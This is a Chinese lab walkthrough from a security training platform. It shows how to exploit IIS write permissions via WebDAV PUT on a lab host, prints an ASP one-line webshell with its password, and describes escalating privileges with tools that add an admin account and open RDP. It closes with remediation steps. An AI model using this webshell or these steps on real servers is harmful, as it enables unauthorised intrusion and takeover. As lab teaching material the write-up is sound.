i春秋实验--IIS写权限漏洞利用

http://www.ichunqiu.com/vm/69/1

目标网址：172.16.12.2

1、扫描目标IIS写入权限

打开浏览器，输入172.16.12.2回车显示是“建设中的IIS服务器”

打开IISPutScanner.exe应用扫描服务器，输入startIP172.16.12.2和endIP172.16.12.2（也可以扫描整个网段），点击Scan进行扫描，如PUT现实为YES则表明服务器存在IIS写权限漏洞。

2、利用IIS写权限写入webshell

　　1）在桌面写asp一句话：<%eval request("123")%> 密码为123，保存为1.txt

　　2）使用IISWrite.exe软件，利用IIS写权限漏洞写入一句话木马

　　

　　点击提交数据包之前查看是否存在/test.txt文件，如不存在则点击提交数据包，系统会自动将提交的一句话木马生成test.txt文件。  

   　 　　　　

　　

 　　提交数据包后系统自动生成test.txt，内容为上传的一句话木马。

　　

　　test.txt里面的内容虽是一句话，但格式是.txt而不是.asp，所有需要使用IISWrite.exe中copy功能复制一份数据，数据名为shell.asp。此时访问172.16.12.2/shell.asp发现访问成功， 说明复制成功。

　　

 　　

　　使用中国菜刀连接http://172.16.12.2/shell.asp 密码123获取webshell

　　

　　提权：

　　systeminfo显示只安装了一个补丁，所以可以尝试iis提权。

　　上传提权工具，iis6.exe pr.exe 3389.exe cmd.exe 

　　

 　　

　　提升权限后，iis6.exe 3389(3389.exe默认打开服务器3389端口并新建用户admin，密码admin123并添加至管理员权限)

3、写权限漏洞修补

　　1）关闭WebDAV

　　

　　　　　　

　　2)网站权限中来宾权限只保留读写权限

　　

　　

　　使用IISPutScanner测试，PUT显示为NO；

　　

　　使用IISWrite测试，提示501

　　

　　说明漏洞修复成功。